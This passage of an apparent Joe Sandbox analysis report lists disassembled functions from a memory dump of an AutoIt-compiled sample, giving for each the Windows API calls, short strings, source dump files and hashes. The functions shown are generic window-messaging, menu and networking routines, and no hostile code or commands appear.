                                            • API String ID: 1983116058-2160076837
                                            • Opcode ID: 034a2ab7117407bf45092fa25f4b8c218aa981f74e7f75a6430e98ae4886df1b
                                            • Instruction ID: 97488b62aaf70896b5d67df019585314e91645306ef70860654ebed6ddd72b09
                                            • Opcode Fuzzy Hash: 034a2ab7117407bf45092fa25f4b8c218aa981f74e7f75a6430e98ae4886df1b
                                            • Instruction Fuzzy Hash: 0B112672520209AFDB05DFB8CC45EFA7BA8FB08354F054629F995E6290E734E850DB60
                                            Function 00869617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowTextLengthW.USER32(00000000), ref: 00869699
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008696A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LengthMessageSendTextWindow
                                            • String ID: edit
                                            • API String ID: 2978978980-2167791130
                                            • Opcode ID: 6a253ca859502271c8dd7f1c5ab4090fb657fdfbf3698e7d0ec6ec20303e4b38
                                            • Instruction ID: 39a3de3f84ba5375ee2879da2e94ae54d26853b494095af76270a75e384b72c6
                                            • Opcode Fuzzy Hash: 6a253ca859502271c8dd7f1c5ab4090fb657fdfbf3698e7d0ec6ec20303e4b38
                                            • Instruction Fuzzy Hash: 97115871100208AAEF119F68DC84EEB3B6EFB25378F514314F9A5D61E0C7359C519760
                                            Function 00845262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 008452D5
                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008452F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 0e32a7d1b8ff9929a2244118bb53b1002b76c9364ca2e4a88bc9510157c12ada
                                            • Instruction ID: a3d095648c6750b698ad162fb4747c75ebbe00b8abfd9911f49fa44ccac45f34
                                            • Opcode Fuzzy Hash: 0e32a7d1b8ff9929a2244118bb53b1002b76c9364ca2e4a88bc9510157c12ada
                                            • Instruction Fuzzy Hash: 9211BE72A0162CABDB20DFD8D944B9D77B8FB06B54F040126E941E729AE3B0AD04CB91
                                            Function 00854D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00854DF5
                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00854E1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$OpenOption
                                            • String ID: <local>
                                            • API String ID: 942729171-4266983199
                                            • Opcode ID: c589e6f2fbee91f36db798d03e18d09f6680dd697e29cee56b9d89bfc8d2c8a6
                                            • Instruction ID: 4a5f7ffa470b48bd5b8448a3baf0c3e901edc8a222975f9fa5750a2198694c77
                                            • Opcode Fuzzy Hash: c589e6f2fbee91f36db798d03e18d09f6680dd697e29cee56b9d89bfc8d2c8a6
                                            • Instruction Fuzzy Hash: 5511A070501225BBDB258F51CC89EFBFBB8FF0676AF10922AF915D6140D3705988D6E0
                                            Function 0085A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • htons.WSOCK32(00000000,?,00000000), ref: 0085A88B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: htonsinet_addr
                                            • String ID: 255.255.255.255
                                            • API String ID: 3832099526-2422070025
                                            • Opcode ID: c4820b1aa639044e3e2d30a274b07f5bd164d9da906c77f4cd5ef56bf9d1d986
                                            • Instruction ID: 867b683caffea46dba9f9bc56f5e0320ac9e9e85979d030e6d94e6f50d8e99b9
                                            • Opcode Fuzzy Hash: c4820b1aa639044e3e2d30a274b07f5bd164d9da906c77f4cd5ef56bf9d1d986
                                            • Instruction Fuzzy Hash: 20012274200304ABCB24AF68C886FA9B365FF44324F108666F912EB2D1DB71E8098752
                                            Function 0083B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0083B7EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 94981a410fba30935b2bcbe23bd481238d8c2381302c767eb8d7ea79202f7a02
                                            • Instruction ID: 0be0257e9fcd1b530424f2d2f92181a0e3f00b928ee3ce42273c2381f6a85dc3
                                            • Opcode Fuzzy Hash: 94981a410fba30935b2bcbe23bd481238d8c2381302c767eb8d7ea79202f7a02
                                            • Instruction Fuzzy Hash: A301B1B1641118ABCB44EFA8CC529FE7369FF85350B040719F962E72D2EB7459088791
                                            Function 0083B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0083B6EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 1318e25f0111e4fcebb942b74741544a716ac0b642522857fd2d573b5517be0d
                                            • Instruction ID: c6aaf4dc147cf172dc495d17c88ab34125c7277b843c66be549d993cb5839b68
                                            • Opcode Fuzzy Hash: 1318e25f0111e4fcebb942b74741544a716ac0b642522857fd2d573b5517be0d
                                            • Instruction Fuzzy Hash: 1A018BB1641108ABCB44EBA8CD63AFE73A8FB55344F100129B902E32D2EB545E1887E6
                                            Function 0083B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 0083B76C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 2ea156c08e97e5b988ca56bb60c65a75ae7bc6c4af1c2d43630f1d82ccb1b6da
                                            • Instruction ID: 3e2f44e8ddd11b29466fe15078c8d41bd0e4a017c48a3907651e5464c1c17b14
                                            • Opcode Fuzzy Hash: 2ea156c08e97e5b988ca56bb60c65a75ae7bc6c4af1c2d43630f1d82ccb1b6da
                                            • Instruction Fuzzy Hash: 1E018BB1641108ABCB40EBA8D913AFE73A8FB85344F100119B902F32D2EB645E0987E6
                                            Function 00847744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp
                                            • String ID: #32770
                                            • API String ID: 2292705959-463685578
                                            • Opcode ID: 53b8d8acd4557676c3053230ea0aea940970c53ba59cac3dd8c4fe21662fb4b4
                                            • Instruction ID: 3943d83b16590292e3f5cc66cba470d5c8583353bb714906d384f12695e78b98
                                            • Opcode Fuzzy Hash: 53b8d8acd4557676c3053230ea0aea940970c53ba59cac3dd8c4fe21662fb4b4
                                            • Instruction Fuzzy Hash: 83E0927760432827DB10EAA9AC0AEC7FBACFB61760F010056B915D3181E674A64187D0
                                            Function 0083A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0083A63F
                                              • Part of subcall function 008213F1: _doexit.LIBCMT ref: 008213FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message_doexit
                                            • String ID: AutoIt$Error allocating memory.
                                            • API String ID: 1993061046-4017498283
                                            • Opcode ID: 44e733e4edcc6c7918e1a4812c15c72f6c38f1ddcef936b92876368a31ae8b1f
                                            • Instruction ID: 22ec209fe5d41051967f4088cad0eb66383ca3aa491f2bb72bc079943fa0e870
                                            • Opcode Fuzzy Hash: 44e733e4edcc6c7918e1a4812c15c72f6c38f1ddcef936b92876368a31ae8b1f
                                            • Instruction Fuzzy Hash: C2D0C2312C032832C21436AC2C1BFC5264CFB25B61F140011BB08D52D259DA858002EA
                                            Function 0087AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0087ACC0
                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0087AEBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: DirectoryFreeLibrarySystem
                                            • String ID: WIN_XPe
                                            • API String ID: 510247158-3257408948
                                            • Opcode ID: 263cc31f20c16b65a3c805a796857c59369277f3de25269ab69ab52810f03f19
                                            • Instruction ID: 47e14327f283f91da072a843cf33dd5f1333a351e26130f19d478400af42a2d2
                                            • Opcode Fuzzy Hash: 263cc31f20c16b65a3c805a796857c59369277f3de25269ab69ab52810f03f19
                                            • Instruction Fuzzy Hash: BEE0C070C04609AFDB1ADBA9D9449ECB7B8FBC8305F14C085E116F2564DB709A84DF22
                                            Function 00868698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008686A2
                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008686B5
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 8955d6dae2fc5c38138b89161c143707767056304622c122849a5736fdfc6c72
                                            • Instruction ID: 2c4c0468c3997731e7e74009e02009b94338c9aab6176f1f652c45fad6f14c91
                                            • Opcode Fuzzy Hash: 8955d6dae2fc5c38138b89161c143707767056304622c122849a5736fdfc6c72
                                            • Instruction Fuzzy Hash: 56D01271384368B7E274A7749C0BFD67B18FB14B21F100915B759EA2D0C9E4E940C755
                                            Function 008686CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008686E2
                                            • PostMessageW.USER32(00000000), ref: 008686E9
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 93808ed4f427d854be1e04beea4ce5acd5cf6e924ea6668ddf052e6d89b02f27
                                            • Instruction ID: cd554b71d1c681b4741af99e31997d0cb9be9ae20b0c0e34a9783439b4d4cfe9
                                            • Opcode Fuzzy Hash: 93808ed4f427d854be1e04beea4ce5acd5cf6e924ea6668ddf052e6d89b02f27
                                            • Instruction Fuzzy Hash: 0CD012713853687BF274A7749C0BFC67B18FB14B21F100915B755EA2D0C9E4E940C755